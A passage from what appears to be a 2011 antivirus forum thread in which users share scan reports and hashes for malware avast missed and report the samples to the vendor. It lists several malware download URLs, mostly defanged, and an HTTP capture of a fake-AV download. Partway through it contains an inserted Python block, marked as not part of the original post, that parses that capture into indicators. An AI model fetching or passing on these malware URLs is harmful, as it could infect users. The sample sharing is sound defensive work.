-http://sydneymoon.com/legal.html - archive HTML
>-http://sydneymoon.com/legal.html/Script.0 infected with Trojan.DownLoad.3140
reported to virus AT avast dot com by
polonus
P.S. There is also a request for GET /tgpx/ HTTP/1.1
Host: -vsebudetzaebis.org Threat see: http://wam.dasient.com/wam/infection_library/681b58b5ed26350b6af5d2dbc224cedc/vsebudetzaebis
Damian
-
Not detected by avast, see: http://www.virustotal.com/url-scan/report.html?id=bf3c5387ab299a2637a69bbefe4ad6f2-1320505950
File analysis: http://www.virustotal.com/file-scan/report.html?id=bca3f956f79168b3fb9d45575a3297fbde77d82fbca42bc0eabc528e0d5f71a6-1320509859
&
http://r.virscan.org/c664fe9cf23bcac71b02f185e11c11dc
Suspicious: http://siteinspector.comodo.com/public/reports/581239 as with BL2, detected distributing of malware, exact find Trojan.Win32.VkHost.bvg (kaspersky)
polonus
-
Undetected Trojan downloader
See: http://www.virustotal.com/url-scan/report.html?id=06e7a3fee5f284a7b953d8e079977ebe-1320506794
See: http://www.virustotal.com/file-scan/report.html?id=84ceb3c87dce08fbab3a9563d4185df4464a56ef0c02e1a8949b2b1504ffe48f-1320510684
See: http://anubis.iseclab.org/?action=result&task_id=1cfaa5ba804f491a439fb8d78b69895ac
also see: http://www.virustotal.com/file-scan/report.html?id=84ceb3c87dce08fbab3a9563d4185df4464a56ef0c02e1a8949b2b1504ffe48f-1320510684
for download03112011.exe
reported to virus AT avast dot com,
pol
-
Not detected by avast, see: http://www.virustotal.com/url-scan/report.html?id=bf3c5387ab299a2637a69bbefe4ad6f2-1320505950
File analysis: http://www.virustotal.com/file-scan/report.html?id=bca3f956f79168b3fb9d45575a3297fbde77d82fbca42bc0eabc528e0d5f71a6-1320509859
&
http://r.virscan.org/c664fe9cf23bcac71b02f185e11c11dc
Suspicious: http://siteinspector.comodo.com/public/reports/581239 as with BL2, detected distributing of malware, exact find Trojan.Win32.VkHost.bvg (kaspersky)
polonus
Your request has been processed by an automatic system. The file you sent is located in the Dr.Web database of trusted (clean) files and is not a threat.
File: Darksiders_v1.0___10_Trainer.exe
MD5: 3f5b547fbb2b9f3e835f3db3a779a7c6
-
Hi Dim@rik,
Well about the detection. It should rather be flagged as a PUP. Maybe DrWeb and avast have different views on the PUP status of this one than for instance other av solutions that flag it,
polonus
-
Avast does not detect TR/Gendal.35840.BR here, see: http://www.virustotal.com/url-scan/report.html?id=d31ed123849d17fb93a6ac24bc7c7b03-1320616157
and
http://www.virustotal.com/file-scan/report.html?id=e8533282e38abebbbf07a7da25594fea5e1c5e165c907f2a3551e7ebc907f856-1320620041
polonus
-
Not detected: http://urlquery.net/queued.php?id=7578
See: http://www.virustotal.com/file-scan/report.html?id=fc5c5ee368f446ea420f97be60fcc140624a1d14ef5f9b3f1d08bd4fef3cea80-1320664388
Infected with TrojWare.Win32.Trojan.Agent.Gen,
Suspicious: http://wepawet.iseclab.org/view.php?hash=361014083ccb4c04a85d415702e034dc&t=1320671503&type=js
polonus
-
Not detected: http://www.virustotal.com/file-scan/report.html?id=040b71dbc9b756a1053fdf93513f8bc2d7154a27a6ea9e58da31e173ac45bed3-1320699561
sample sent.
-
Thanks chabbo for improving detection.
-
Backdoor trojan not detected by avast:
See: http://www.virustotal.com/url-scan/report.html?id=851e64f4641f6bd8f5b9975193ecbff1-1320928604
See: http://www.virustotal.com/file-scan/report.html?id=60cee08a156021bbccaf0398dc87b48338591248c2875e49f286d6e32b29f264-1320932212
See BL3, detected distributing of malware (PHP/C99Shell.F): http://siteinspector.comodo.com/public/reports/608642
reported to virus AT avast dot com,
polonus
-
fake AV.
http://www.virustotal.com/file-scan/report.html?id=631a7cd023ae4d5295607f8cc0c21bb7d3048fb09cc3885de9fb34ee9a106ddd-1321051547
avast got the sample 1 day ago, still no detection,
-
Well here some find it safe: http://f.virscan.org/vclean.exe.html
Here it is seen as a dropper: http://www.prevx.com/filenames/1272200888907706236-X1/VCLEAN.EXE.html
Here it is not trusted: http://isthisfilesafe.net/sha1/29D50A116011FF0C317AC552F35E7CF2E1EAA242_details.aspx
polonus
-
Trojan-dropper or SPR/Tool.RDPBrute.241664.1 not detected by avast
See: http://www.virustotal.com/url-scan/report.html?id=a82b8cdf97b450e9c112d42c5a880d4f-1321046352
and
http://www.virustotal.com/file-scan/report.html?id=9fd83c6aadf764dded4effa3a2926a2c02269da04dd748cd90caaea92c6e5440-1321052723
See: http://www.threatexpert.com/report.aspx?md5=aaaaa7e2a9a7c93747df905fd1488406
polonus
-
http://www.virustotal.com/file-scan/report.html?id=4ea942bca8c6763964c64b4fb0f77f378b3251fdb650ec0ca8be87d93abbacfd-1321047395
http://www.virustotal.com/file-scan/report.html?id=b47d5e832843f4910560216f9b49b34d5bc1911ebb5cf59e5705c052b6e22f11-1321121282
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
http://www.virustotal.com/file-scan/report.html?id=b47d5e832843f4910560216f9b49b34d5bc1911ebb5cf59e5705c052b6e22f11-1321121282
http://www.virustotal.com/file-scan/report.html?id=375383b7f08e88713be5cb0febaa1d073f4c59fd1db98743a1718d7564a772f0-1320953150
samples sent to avast! by dim@rik
refer:
http://forum.avast.com/index.php?topic=88283.0
-
The links you gave in another posting were not all checked against the webshield.
This one was rightly detected and blocked by the avast webshield as URL:Mal
-http://adensity.com/facebook-pic-
Most other links you gave there were flagged by DrWeb's URL Checker
-http://sandhuforgings.co.uk/images/1.exe infected with Trojan.DownLoad2.42876
-http://sandhuforgings.co.uk/images/had.exe infected with Trojan.DownLoader5.5922
-http://sandhuforgings.co.uk/images/dd.exe infected with Trojan.DownLoader5.11806
-http://familytindoor.net/stat/081111.exe infected with Trojan.PWS.SpySweep.52
polonus
-
familytindoor.net/stat/081111.exe
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
not yet detected :'(....
-
familytindoor.net/stat/081111.exe
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321121178
not yet detected :'(....
This VT scan is two days old ;)
-
This VT scan is two days old ;)
thanks, I hope it is detected ::)
-
This VT scan is two days old ;)
thanks, I hope it is detected ::)
Did you send the sample to Avast..??
-
samples sent to avast! by dim@rik
refer:
http://forum.avast.com/index.php?topic=88283.0
-
please send this for me....thanks! :-*
http://www.virustotal.com/url-scan/report.html?id=691a4b0ecc3a1f95fdf7178cbd1ae1e4-1320816656
http://www.virustotal.com/file-scan/report.html?id=79f63c0da8fe6c841ff52eaaa8d474c0a6b9b370912da3c1731ff1a904ae34cf-1320820260
-
please send this for me....thanks! :-*
Send it yourself. :P
-
I don't want to risk myself....sorry! :-[....but..I want to improve detection! :-[
-
thanks! in advance...please send it! :-*
http://www.virustotal.com/url-scan/report.html?id=5a6f0ab7963f959bca380a63c2c7a716-1321264168
http://www.virustotal.com/file-scan/report.html?id=a162ca722e00ab60820de6b733a90f31d4963128325fecac5f5cc26252f779d4-1321267940
-
I don't want to risk myself....sorry! :-[....but..I want to improve detection! :-[
Well, that's not how this thread works. ;)
-
Well, that's not how this thread works. ;)
Yes I know...but I am sorry...I am just a security freak! :-[ :'(
-
Hi true indian,
You could send the suspicious link to virus AT avast dot com and as long as the link is up and alive they can run the binary analysis and add detection if found to be malicious.
The analysts should have received them anyway through the channels they use as resources, but some av take a couple of days to be "up to the mark". That is called the vulnerability gap, and it should not be left open too long. Av-solutions are not always overlapping and sometimes complementary. Just check the links you gave here: http://online.us.drweb.com/?url=1 and you see a lot of those you come up with are detected. That is why I have it as a complementary scanner next to avast web rep.
I assume the way Tech intended this thread is to add to detection in a way that one has/downloads a particular undetected file in zipped format and password protected and then send it to virus AT avast dot com with the password to be analyzed and eventually be added to detection. If you want to do that, you should have the VM lab settings for it, know how to work malzilla for instance and run a file in a sandbox environment. You should know how to block script running and be able to determine when to click links or not and you should feel security aware enough,
polonus
-
thanks for the advice polonus! I will try as you said ;D
-
I don't want to risk myself....sorry! ....but..I want to improve detection!
Well, that's not how this thread works. ;)
Yes I know...but I am sorry...I am just a security freak! :-[ :'(
Then you are not a real security freak ;D
-
This VT scan is two days old ;)
thanks, I hope it is detected ::)
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=50482d07dbd2004aa05cc6f44b64d5f136b53b6cec9b2692c22a2e6b3e486b27-1321279046
-
thanks! polonus good to see avast is detecting them :)
-
thanks! polonus good to see avast is detecting them :)
wrong name....Pondus and Polonus are not the same 8)
-
thanks! polonus good to see avast is detecting them :)
wrong name....Pondus and Polonus are not the same 8)
;D 8)
-
wrong name....Pondus and Polonus are not the same 8)
HEY! sorry...but that's rhyming ;D 8)...LOL
-
Hi true indian,
Well Pondus and polonus are not the same, but they are cooperating here to analyze malicious URLs etc. Pondus gets a lot of information from polonus and polonus gets a lot of information from pondus. And there are more users in this particular group of connoisseurs, as there is Asyn, Dim@rik, spg SCOTT, and a couple of others,
polonus
-
Batch Original
(AVAST DETECTED THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=716b077fa6b6994753800f6cad425d0b18fb36408809cb7d6f6a27b9d39a6df7-1321326555
Regular EXE
(AVAST DETECTED THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=7dadbe3fad94cdf27d9bc8c88039cdbaadff0a314a87fddfd512460a2c149fc6-1321326379
EXE Virus with password passavast & encrypted
(AVAST DID NOT DETECT THIS ONE)
http://www.virustotal.com/file-scan/report.html?id=d4af3f1ed1573f9b8cd2eab8b33d3ab18cb02529c8ae1f667a218f47cc442347-1321326498
The following files were made 10/23/2011.
On 10/23/2011, the following files had the following reports:
Original Batch; 5/42, Avast Detects
EXE Virus; 6/43, Avast Does NOT Detect
EXE Encrypted and Password Protected; 1/43, Jiangmen Only, Avast Does NOT Detect
Comodo Results (What it does):
-http://camas.comodo.com/cgi-bin/submit?file=7dadbe3fad94cdf27d9bc8c88039cdbaadff0a314a87fddfd512460a2c149fc6
-
http://www.virustotal.com/file-scan/report.html?id=939e021f6a2500a172a3f08f1e734c9fb2f44519f7089cce4bb5fa6012fa51f3-1321373185
sent to avast
-
Thanks for helping improving detection.
-
http://www.virustotal.com/community.html
latest comments columns for VT results...
Sent to avast! by one of my friends.
-
If only the VT comments column was sent, that doesn't help as you need a sample to analyse, comments are of no use.
-
Hi DavidR,
Why true indian's comment? Makes no sense. Normally avast gets these hashes anyway, see: http://ore.carnivore.it/malware/engine/virustotal
As I hope the avast virus analysts will get all the malware there automatically from Engines like VirusTotal, Anubis, CWSandbox to check on. But will they?
Apparently no one there has seen this one yet: http://ore.carnivore.it/malware/hash/b58c7ea56b3343419e7852176fe7ee4d (Avast does not detect),
so we still have to do lots of work for them,
polonus
-
Well it is hard to read true indian's post, but my interpretation of it is I'm not sure if only the VT comments column information was sent to avast or the file and the comments or what was sent.
Yes they get samples, but A) not in a timely fashion and B) they (avast labs member) reported that there is so much junk in there that it isn't that helpful. Which is why I feel it best not to rely on VT sending any sample and send it directly yourself.
-
my friend sent the password protected samples ;)
-
http://www.virustotal.com/file-scan/report.html?id=4c32b819d8f5a08af3180d64d840d3ff0e12f18f9cf5a1e854b0b93fedef0982-1321683454
http://www.virustotal.com/file-scan/report.html?id=5b212d80e06647c698484145a77d6f7179b911c8bf3efe57ea71561149e1ff6c-1320762323
http://www.virustotal.com/file-scan/report.html?id=b541a7647ae211b82baa357681136a1557e5d5e63705fbed45768335063390d4-1321695885
-
L.S.
For the first VT file result given in the row in the previous posting. This info could also be interesting for users to know. Some more info about the general threat since November 16th last from Cisco: http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=24212 link info provided by Cisco Threat Outbreak Alert by Cisco threat analysts, so a general mail threat!
polonus
-
http://www.virustotal.com/file-scan/report.html?id=dabe9b890b3af51c56d8990123b2bf6db0cf42c47e6aec7accd455894baf78de-1321792341
http://www.virustotal.com/file-scan/report.html?id=b611fb2dd28d05cdade1e2a7a60bc506503d857214efe4dffe42002585fa2f24-1321792565
-
Unknown google malware not detected here: http://www.virustotal.com/url-scan/report.html?id=7a8c4b07930ab724a8677f5806e7026a-1321906641
http://www.virustotal.com/file-scan/report.html?id=020a56d4541201f4daabe2c2b7c4e059ae6aac7838f073f1fe96e6073ed5d4f5-1321910484
Only Avira detects according to: http://vscan.urlvoid.com/analysis/358e5bf8168f49f29f3849a098da41f2/c2VsbG1lMi1leGU=/
reported to virus AT avast dot com
polonus
-
So-called Toggle-virus to mdl_zeus v2 trojan bot detected by avast:
See: http://www.virustotal.com/url-scan/report.html?id=cb0a29dd89c7b5922bf16e1d92d4fdc8-1322143020
and file scan: http://www.virustotal.com/file-scan/report.html?id=d1522235c1bde90caeb3fe2a01cf20447dc0801c48d55ce168262bfeb11f8a6b-1322146839
See: http://threatcenter.crdf.fr/?More&ID=53545&D=CRDF.Malware.Win32.PEx.9885989241
polonus
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=5779c4e1f87bae0c9824cc0d7756eb18872f898b4b8a376450c21cc0af20853f-1322253312
2: http://www.virustotal.com/file-scan/report.html?id=fbebe07698a9131e21d3fe35135170ff66f276206ce8ea7a5f3dc8f03457e67b-1322258316
3: http://www.virustotal.com/file-scan/report.html?id=23ce319fe0bcfb2145c8235ea03c9a88e6f0f1c8a9012ca2566781a18e0df719-1317477939
4: http://www.virustotal.com/file-scan/report.html?id=957ee6fe70f078dde26cba2b7f3c459d46906b9b7e73abfb88c281d02ffa030f-1322262162
-
Not detected by avast TR/Dropper.Gen, see VT reports:
http://www.virustotal.com/url-scan/report.html?id=03eaaf10f32a125d14c7d671088811f2-1322315364
and
http://www.virustotal.com/file-scan/report.html?id=66c2910fdd8a276fa259ee5ebb8a7f6c8c80e9c850e431383835f05deaf997f4-1322319180
polonus
-
Hi folks,
See: http://www.virustotal.com/url-scan/report.html?id=0ae5f16b5624044f5994406e5e1d16ba-1322346824
and
http://sakrare.ikyon.se/log.php?id=19177
see Sucuri detection of mentioned malware:
web site: -http://www.modeplatsen.se
status: Site infected with malware
web trust: Not Blacklisted
Malware found in the URL:
-http://www.modeplatsen.se
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
polonus
-
Virus?
http://www.virustotal.com/file-scan/report.html?id=d5e1bbc7c2338ff9326cb4a698b65a447bd3d9827d2947c39db1d4b4ebba313c-1323115997
-
Virus?
http://www.virustotal.com/file-scan/report.html?id=d5e1bbc7c2338ff9326cb4a698b65a447bd3d9827d2947c39db1d4b4ebba313c-1323115997
Looks like a very old macro for WinWord 95
-
Hi Dim@rik,
Well a year means ages in computer terms: 2011/01/15 13:57:20 (CET)
But 2008 means a golden oldie:
Detected Jun 15 2008 16:27 GMT
Released Jun 15 2008 21:14 GMT
McAfee Description Modified 2004-06-09
polonus
-
Hi Dim@rik,
Well a year means ages in computer terms: 2011/01/15 13:57:20 (CET)
But 2008 means a golden oldie:
Detected Jun 15 2008 16:27 GMT
Released Jun 15 2008 21:14 GMT
McAfee Description Modified 2004-06-09
polonus
Hi Polonus
Old macro :)
-
@Dim@rik
Old hits.
Regards,
Damian
-
See: http://www.virustotal.com/url-scan/report.html?id=833ba4370a302059694636f14f1bd217-1323187934
and
http://www.virustotal.com/file-scan/report.html?id=2101461338093052af0a45936d9c1aa6c6fb4546849f192ab2a02a224a8c2bac-1323191725
High risk: http://siteinspector.comodo.com/public/reports/748001
polonus
-
Bookmarked
-
Bookmark it, stickies are a pain in the rear; not long back you had to scroll down to get to the live content too many stickies.
-
Bookmark it, stickies are a pain in the rear; not long back you had to scroll down to get to the live content too many stickies.
+1
-
zeus v2 trojan detection
See: http://www.virustotal.com/url-scan/report.html?id=44fe92bbbdf8dba89791a2d93cb2aa21-1323275210
See: http://www.virustotal.com/file-scan/report.html?id=197073d0ff15cda527ab0eba11614885b533e6cf5d27a359719365e292fad7ed-1323278814
Blacklisted: http://siteinspector.comodo.com/public/reports/754142
reported to virus AT avast dot com
pol
-
Winlock aka Ransom
http://www.virustotal.com/file-scan/report.html?id=b8fd8574cddd5f42cee752b90d335d273ce841b8832226888e796534951145ac-1323284069
http://www.virustotal.com/file-scan/report.html?id=d072a8782c4bf5e7c9d2f8194a52a17775fb0a5171ff76b64f20312e93ed2866-1323284252
exploit pack - Exploit.Java.CVE-2011-3544 (caught on the same site that spreads the blockers)
http://www.virustotal.com/file-scan/report.html?id=e033996289f657e5c3549239049432e1e0c342810eb8a9cabd28dfe070eecdb8-1323284330
Sent to Avast.
Dim@rik
-
W32/Pinkslipbot.gen.as
http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044
-
W32/Pinkslipbot.gen.as
http://www.virustotal.com/file-scan/report.html?id=9f7b01a804dc29d301c169cd292bf6c8cd88b15ca1e0ee35f47c1aee8f3c9b99-1323436044
Nice catch..! :)
-
http://www.virustotal.com/file-scan/report.html?id=305c4e7165d53f37fe537c53c9067518dcc069e55f58473fcba607c5b5d665ba-1323451619
Rogue.FakeHDD
-
Hi razoreqx,
Same category: http://www.virustotal.com/file-scan/report.html?id=e4e269d9ad00071607b85105055b223b781fc7ab0f0df70f79f084ae0d639304-1323464483
See this analysis, based on same MD5 hash: http://camas.comodo.com/cgi-bin/submit?file=e4e269d9ad00071607b85105055b223b781fc7ab0f0df70f79f084ae0d639304
This is how DrWeb's URL scanner detected this malware:
Checking: -http://46.166.157.31/up_4.exe
Engine version: 5.0.2.3300
Total virus-finding records: 2910580
File size: 169.50 KB
File MD5: 0f38403648d34e9987abf501af245973
-http://46.166.157.31/up_4.exe packed by UPX
>-http://46.166.157.31/up_4.exe infected with BackDoor.IRC.NgrBot.42
reported to virus AT avast dot com,
polonus
-
Winlock aka Ransom
http://www.virustotal.com/file-scan/report.html?id=9533fad13324e0aa16ec9d7250753a28ea7ec1972c946c0dd9eb502ffd73372d-1323503872
http://www.virustotal.com/file-scan/report.html?id=b71cc22b75dde1610ba065151f87735d2715c4d4414846a68aca9b59dae9874b-1323504047
http://www.virustotal.com/file-scan/report.html?id=4b5a061be2f901a13ecb6b53cb3bf5ba111ae5cf53187cd7fae496d6822040ab-1323545076
http://www.virustotal.com/file-scan/report.html?id=cc8b56624eb01e5b1ed97176beee1069a0feedd3a889df726797b22e63efb8f1-1323545889
reported to virus AT avast dot com
-
http://www.virustotal.com/file-scan/report.html?id=afe2dad20ed7197d4c5ea434754a8244ab74dca897eed1be406c49312410911f-1323690671
Win32/Kryptik.XDF
Sample uploaded
-
http://www.virustotal.com/file-scan/report.html?id=e0418aedec38ddd20ec322c736c1090f88de9522d00f49289c8cabb65e91d35d-1323691928
Rogue.FakeRean
Sample uploaded.
GET /SecureKit2011.exe HTTP/1.0
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hxxp://ihbbdbungles.info/global-scan/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; WinTSI 08.01.2010; .NET4.0C; .NET4.0E)
Host: ihbbdbungles.info
Connection: keep-alive
Via: 1.1 OHAEPHQAS700
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sun, 11 Dec 2011 19:40:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Sun, 11 Dec 2011 19:37:03 GMT
ETag: "4e6d9e-44e00-4b3d6247715c0"
Accept-Ranges: bytes
Content-Length: 282112
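The request/response pair above is the kind of capture worth turning into indicators rather than pasting raw. The following is an added example, not code from the forum post: it parses one captured HTTP exchange (headers only, as posted) into the host, URL, referer, server banner and payload size, and applies a rule for "executable delivered from a page on the same host with 'scan' in its path", which is what the `/global-scan/` referer in this Rogue.FakeRean download shows. The capture embedded below is the one quoted above with the long Accept and User-Agent values trimmed; the rule and its keyword are assumptions made here, not a published signature.

```python
"""Added example (not part of the original post): parse a captured HTTP
download into a few indicators and apply a crude fake-scanner rule.
The capture is the one from the post (hostname as posted, long header
values trimmed); the rule is an assumption for this example."""

CAPTURE = """GET /SecureKit2011.exe HTTP/1.0
Accept: image/gif, image/jpeg, application/x-shockwave-flash, */*
Referer: hxxp://ihbbdbungles.info/global-scan/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ihbbdbungles.info
Connection: keep-alive
Via: 1.1 OHAEPHQAS700
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sun, 11 Dec 2011 19:40:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Sun, 11 Dec 2011 19:37:03 GMT
ETag: "4e6d9e-44e00-4b3d6247715c0"
Accept-Ranges: bytes
Content-Length: 282112
"""

# MIME types under which Windows executables are commonly served.
EXECUTABLE_TYPES = {"application/x-msdownload", "application/octet-stream", "application/x-dosexec"}


def _headers(lines):
    """'Name: value' lines to a dict keyed by lower-case header name."""
    hdrs = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            hdrs[name.strip().lower()] = value.strip()
    return hdrs


def parse_exchange(capture):
    """Split one request/response pair (no bodies) into its parts.
    The response starts at the first line beginning with 'HTTP/'."""
    lines = [l.rstrip("\r") for l in capture.strip().splitlines() if l.strip()]
    split = next(i for i, l in enumerate(lines) if l.startswith("HTTP/"))
    method, path, version = lines[0].split(" ", 2)
    status = int(lines[split].split(" ")[1])
    return {
        "method": method, "path": path, "version": version,
        "request": _headers(lines[1:split]),
        "status": status,
        "response": _headers(lines[split + 1:]),
    }


def extract_iocs(capture):
    """Indicators a blocklist or a report would want from the exchange."""
    ex = parse_exchange(capture)
    host = ex["request"].get("host", "")
    return {
        "host": host,
        "url": "http://" + host + ex["path"],
        "referer": ex["request"].get("referer"),
        "user_agent": ex["request"].get("user-agent"),
        "server": ex["response"].get("server"),
        "content_type": ex["response"].get("content-type"),
        "size": int(ex["response"].get("content-length", 0)),
        "last_modified": ex["response"].get("last-modified"),
        "etag": ex["response"].get("etag"),
    }


def is_fake_scanner_download(iocs):
    """Assumed rule: an .exe payload whose Referer is a page on the same host
    with 'scan' in its path, i.e. the download follows a fake online scan."""
    ref = (iocs["referer"] or "").replace("hxxp://", "http://")   # undo defanging
    same_host = ref.startswith("http://" + iocs["host"] + "/")
    return (iocs["content_type"] in EXECUTABLE_TYPES
            and iocs["url"].lower().endswith(".exe")
            and same_host and "scan" in ref.lower())


if __name__ == "__main__":
    found = extract_iocs(CAPTURE)
    print(found, is_fake_scanner_download(found))
```

The `Last-Modified` value (three minutes before the request) and the `ETag` are as useful as the hash here: they tell you the payload was freshly built, which is consistent with the low VT detection count in the post.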
-
VirusTotal - 10/43 - SkyKeygen Avast 6.x.x.exe
http://www.virustotal.com/file-scan/report.html?id=794c9496ba67d57f2efcbe14ad1c7ce3e4f8744d7c73933b31f9f918cffd79bf-1323722776
soon in avast inbox ;)
ThreatExpert
http://www.threatexpert.com/report.aspx?md5=3687024420926c956f6260405aa08592
-
Trojan.FakeAlert
file: scandsk.exe
http://virusscan.jotti.org/en/scanresult/0fb58945fd6cadafc9c03010c7bceebc5691a315
http://www.metascan-online.com/results.cgi?uid=gu4camxrse0oaaci043y25zp5tn4p9cx
ThreatExpert.
http://www.threatexpert.com/report.aspx?md5=8fa84e89b3d20659a6c9aec9bb5b0829
Sample Sent.
-
Zeus config url not detected Zeus C&C everest-club dot ru: http://vscan.urlvoid.com/analysis/b1bf3c1430056ba2fefcc718f8e3be29/d2UtZXhl/
See: http://siteinspector.comodo.com/public/reports/show_log?id=5953
polonus
-
Trojan.Karagany
http://www.virustotal.com/file-scan/report.html?id=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369-1323876452
http://camas.comodo.com/cgi-bin/submit?file=6e8ef8e2e14589787c54add5673570491a577473fae45e1eca626ff71a075369
http://www.threatexpert.com/report.aspx?md5=59392f88262a30db38f29486b46bb7b6
-
Undetected, PUP, riskware or FP?
http://www.virustotal.com/url-scan/report.html?id=6c9e59e62b725654da98b9bf4be2927b-1323874134
&
http://www.virustotal.com/url-scan/report.html?id=6c9e59e62b725654da98b9bf4be2927b-1323874134
&
http://camas.comodo.com/cgi-bin/submit?file=9fa77a2795e02b6c3932a517cb573eb520c2421c9d78f79a003b4e06eb91fcce&iframe=
last scan gives undetected... see: http://urlquery.net/queued.php?id=11825 (suspicious)
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=a194e954d39c0dd69ffb05f6c652e712-1323874466
&
http://www.virustotal.com/file-scan/report.html?id=8d08a15049f68e1352f08b2ac0b32b8d642c176801821811a235bf6ddf6bcc1a-1323878220
Here detected by DrWeb URL checker:
-http://u.websuprt.co.kr/NewSidebar/webSupporter/webSurt.exe
Engine version: 5.0.2.3300
Total virus-finding records: 2928866
File size: 317.96 KB
File MD5: 5b1c5f2547628a212d403abd3f62cc9b
-http://u.websuprt.co.kr/NewSidebar/webSupporter/webSurt.exe contains an advertising software Adware.Searcher.1334
reported to virus AT avast dot com, could be added as PUP (so won't be seen, but can be added)
pol
-
Submitted via Virus Chest.
http://virusscan.jotti.org/en/scanresult/6aaefaeb55cdae5e001f9b6f4e29b4049772e971
http://www.threatexpert.com/report.aspx?md5=b69811163d48fc9ef16a939242dcbacc
-
WORM/Dorkbot.AD.1 not detected: http://www.virustotal.com/file-scan/report.html?id=ca156ba8d276e76787e6d433a392c8f3dc9755d9954e7bcb6d5c68d80b1cd663-1323989079
See: http://camas.comodo.com/cgi-bin/submit?file=ca156ba8d276e76787e6d433a392c8f3dc9755d9954e7bcb6d5c68d80b1cd663
and
http://www.threatexpert.com/report.aspx?md5=1b52eeaf196290fade3a8c1ad62a8710
malicious: http://urlquery.net/report.php?id=12105
reported to virus AT avast dot com
polonus
-
See: http://www.virustotal.com/url-scan/report.html?id=ef0c31e8e60340a67f8a046f78e5d78c-1324059347
&
http://www.virustotal.com/file-scan/report.html?id=ca060c4b10b6a548cc50539ba38586fe51cee2cfc9bd27e5a83ccc74e333fccc-1324062950
TROJ_PIDEX.SMJ not detected
anubis analysis report: http://anubis.iseclab.org/?action=result&task_id=117cadcbdf18399f4792ad31722f749db
polonus
-
TR/PSW.Zbot.Y.2067 not detected:
http://www.virustotal.com/url-scan/report.html?id=6acdbdc39e21f86dd10d720857812e41-1324060092
&
http://www.virustotal.com/file-scan/report.html?id=2c07f90d8890b04ef45528869daae4b9e307a94cb8a8e14801379b23a0a4bff4-1324063832
reported to virus at avast dot com
Well and this one was in their own back garden, abuse at nethost dot cz
D
-
Detection of EXP/SWF.AH missed:
See: http://www.virustotal.com/url-scan/report.html?id=ab5f83eeac09e5ba58b7dbae15d7f1ff-1324127882
and
http://www.virustotal.com/file-scan/report.html?id=c2b39f12699301b18eba51660dd2e3991d58f3a48c2cf2dbb972e5110abc20ba-1324134052
Malware galore there: http://www.google.com/safebrowsing/diagnostic?site=http%3A//chat4freelab.in/content/field.swf
reported to virus AT avast dot com
polonus
-
Detection missed for worm: http://www.virustotal.com/url-scan/report.html?id=e9ad4368a9d455a0cc25c9671634b9bb-1324214647
and
http://www.virustotal.com/file-scan/report.html?id=98bce191023c09a8c0265668a1f8fedc05baeed2fba3d15bab3acad07132e13d-1324218382
polonus
-
Undetected malwares
1: http://www.virustotal.com/file-scan/report.html?id=c16438de2cf1615ff5775ff8c3a6dfcd6c28b3490e611b02a26d7fe884e90aad-1324245994
2: http://www.virustotal.com/file-scan/report.html?id=0c59457bd4abeb6a7fb824ef9c297eb60ae5f8fa6b0a5966c93a39ef6165d7ce-1324246777
-
Is this the same by the way http://www.virustotal.com/file-scan/report.html?id=0c59457bd4abeb6a7fb824ef9c297eb60ae5f8fa6b0a5966c93a39ef6165d7ce-1324246777
a keyfinder setup executable
polonus
-
http://www.virustotal.com/file-scan/report.html?id=9596cc829ec3aa8698d641822f552ae9a9aaed988706e3f89992d593fe71f318-1324299135
http://virusscan.jotti.org/en/scanresult/0ff465579a7ce5235bf37c1429673cbe736b0586
http://urlquery.net/report.php?id=12565
-
mdl_trojan Winlock/FakePoliceAlert to unknown_exe missed by avast, see:
http://www.virustotal.com/file-scan/report.html?id=e874026aeae1c7182d8155dc2ca76887e1b31bd882f3626a56b7a0d3a9dc4531-1324293612
see: -http://urlquery.net/report.php?id=12533
WOT would stop you from going there anyway because of its very bad web rep:
http://www.webutation.net/go/review/git7868777777777.nl.ai
pol
-
http://virusscan.jotti.org/en/scanresult/f5df750c0717aefbc74bc8686f0f117f0c7acb36
https://www.virustotal.com/file-scan/report.html?id=737e2c8e1729b860c65e4daf012e7eb4ec9855a9701ea3997626bb37167790dc-1324305873
-
Hi razoreqx,
Good find. PM-ed you about why I think it is definitely trojan malcode i.m.o. Thanks for adding to avast detection,
pol
-
Hi razoreqx,
Good find. PM-ed you about why I think it is definitely trojan malcode i.m.o. Thanks for adding to avast detection,
pol
No thanks to you my friend! You're an amazing researcher (and a good teacher)!
-
http://virusscan.jotti.org/en/scanresult/580122ddae9bdcd79e09be0e397b1c80d1427e20/9a541f483fd5cef441aeb764d0b2622966a5f342
http://www.virustotal.com/file-scan/report.html?id=67de3f40a965cda98a4e1485d05cb2b22c754e9cb6ae11da019fcca774e9f293-1324310635
